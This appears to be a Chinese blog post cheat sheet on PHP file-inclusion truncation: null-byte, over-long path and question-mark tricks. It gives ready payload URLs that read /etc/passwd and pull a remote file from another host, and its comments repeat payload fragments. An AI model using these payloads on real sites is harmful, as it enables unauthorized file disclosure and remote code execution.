文件包含截断
1、00截断法
00字符截断(php<5.3.4)
(需要 magic_quotes_gpc=off)
/etc/passwd
/etc/passwd%00
http://include.moonteam.com/file02.php?file=x.jpg%00
2、超长文件截断
(php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256)
利用操作系统对目录最大长度限制。
在window下256字节
linux下4096字节
截断的字符有
http://include.moonteam.com/file02.php?file=x.jpg..........................................................................................................................................................................................................................................
http://include.moonteam.com/file02.php?file=x.jpg%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e
3、问号截断
适用于远程截断。
php>=5.3
allow_url_fopen On
allow_url_include On
http://www.webtester.com/include/file02.php?file=http://192.168.0.121/x.txt?
下一篇:怎么从目录里getshell
相关文章
- 4条评论
拥嬉俗欲2022-06-02 11:19:02- %2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e
夙世悸初2022-06-02 06:57:26- onteam.com/file02.php?file=x.jpg.....................................................
余安渔阳2022-06-02 14:18:24- f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f
蓝殇青尢2022-06-02 09:55:35- om/file02.php?file=x.jpg%00 2、超长文件截断(php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256)利用操作系统对目录最大长度
滇ICP备19002590号-1